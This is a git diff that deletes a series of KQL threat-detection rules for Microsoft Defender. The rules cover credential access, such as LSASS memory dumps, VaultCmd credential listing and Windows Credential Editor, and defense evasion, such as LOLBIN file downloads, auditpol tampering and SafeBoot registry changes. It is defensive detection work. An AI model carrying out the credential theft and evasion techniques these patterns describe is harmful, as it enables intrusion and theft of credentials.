--- a/Credential Access/VolumeShadowCopy_Symlink_Creation_Via_Mklink.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies storage symbolic link creation using operating systems utilities
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql b/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql
deleted file mode 100644
index 2afb8c5f..00000000
--- a/Credential Access/WerFault_LSASS_Process_Memory_Dump.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/27
-// Level: high
-// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/Credential Access/Windows_Credential_Editor_Registry.kql b/Credential Access/Windows_Credential_Editor_Registry.kql
deleted file mode 100644
index df152890..00000000
--- a/Credential Access/Windows_Credential_Editor_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/12/31
-// Level: critical
-// Description: Detects the use of Windows Credential Editor (WCE)
-// Tags: attack.credential_access, attack.t1003.001, attack.s0005
-DeviceRegistryEvents
-| where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql b/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql
deleted file mode 100644
index 823b25cd..00000000
--- a/Credential Access/Windows_Credential_Manager_Access_via_VaultCmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: medium
-// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
-// Tags: attack.credential_access, attack.t1555.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql b/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql
deleted file mode 100644
index 5c77ac85..00000000
--- a/Defense Evasion/ADS_Zone.Identifier_Deleted_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/04
-// Level: medium
-// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
deleted file mode 100644
index 857eb759..00000000
--- a/Defense Evasion/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: high
-// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/Defense Evasion/Abusing_Print_Executable.kql b/Defense Evasion/Abusing_Print_Executable.kql
deleted file mode 100644
index a62f50b9..00000000
--- a/Defense Evasion/Abusing_Print_Executable.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
-// Date: 2020/10/05
-// Level: medium
-// Description: Attackers can use print.exe for remote file copy
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql b/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql
deleted file mode 100644
index 3969c5ac..00000000
--- a/Defense Evasion/Access_To_Windows_Outlook_Mail_Files_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: low
-// Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
-// Tags: attack.t1070.008, attack.defense_evasion
-DeviceFileEvents
-| where (FileName contains "\\AppData\\Local\\Comms\\Unistore\\data" or FileName endswith "\\AppData\\Local\\Comms\\UnistoreDB\\store.vol") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql b/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql
deleted file mode 100644
index 6a5eaf90..00000000
--- a/Defense Evasion/Activate_Suppression_of_Windows_Security_Center_Notifications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql b/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql
deleted file mode 100644
index 9a560793..00000000
--- a/Defense Evasion/Add_DisallowRun_Execution_to_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql b/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql
deleted file mode 100644
index 65afca78..00000000
--- a/Defense Evasion/Add_Insecure_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects usage of winget to add a new insecure (http) download source.
-Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Add_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_New_Download_Source_To_Winget.kql
deleted file mode 100644
index cc0181f1..00000000
--- a/Defense Evasion/Add_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new additional download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
deleted file mode 100644
index 2fc70f43..00000000
--- a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new potentially suspicious download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql b/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql
deleted file mode 100644
index 350c9856..00000000
--- a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/02
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot"
\ No newline at end of file
diff --git a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql b/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql
deleted file mode 100644
index e61ed7f2..00000000
--- a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/AgentExecutor_PowerShell_Execution.kql
deleted file mode 100644
index 01323d08..00000000
--- a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022/12/24
-// Level: medium
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql b/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql
deleted file mode 100644
index 7d763754..00000000
--- a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql b/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql
deleted file mode 100644
index 3528b66c..00000000
--- a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/01
-// Level: medium
-// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
-// Tags: attack.defense_evasion
-DeviceImageLoadEvents
-| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql b/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql
deleted file mode 100644
index d8a1500d..00000000
--- a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects execution of of Dxcap.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql b/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql
deleted file mode 100644
index caf25951..00000000
--- a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql b/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql
deleted file mode 100644
index fb086580..00000000
--- a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
deleted file mode 100644
index 124d7a9b..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
deleted file mode 100644
index f28e5897..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
deleted file mode 100644
index 03309431..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSOHTMED" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql
deleted file mode 100644
index 6f5fc727..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
deleted file mode 100644
index 3f3dd72d..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql
deleted file mode 100644
index b4580a08..00000000
--- a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
deleted file mode 100644
index 8441648d..00000000
--- a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/Defense Evasion/AspNetCompiler_Execution.kql b/Defense Evasion/AspNetCompiler_Execution.kql
deleted file mode 100644
index 52dbd8ef..00000000
--- a/Defense Evasion/AspNetCompiler_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/24
-// Level: medium
-// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql b/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql
deleted file mode 100644
index ec22dd8d..00000000
--- a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS "
\ No newline at end of file
diff --git a/Defense Evasion/Atbroker_Registry_Change.kql b/Defense Evasion/Atbroker_Registry_Change.kql
deleted file mode 100644
index 465dcede..00000000
--- a/Defense Evasion/Atbroker_Registry_Change.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
-// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql
deleted file mode 100644
index 833d5e8a..00000000
--- a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps)
-// Date: 2021/02/02
-// Level: high
-// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql
deleted file mode 100644
index ee26e9fb..00000000
--- a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: high
-// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none"
\ No newline at end of file
diff --git a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql b/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql
deleted file mode 100644
index d58c690b..00000000
--- a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
-// Date: 2020/10/23
-// Level: high
-// Description: Detects attackers using tooling with bad opsec defaults.
-E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
-One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
-
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
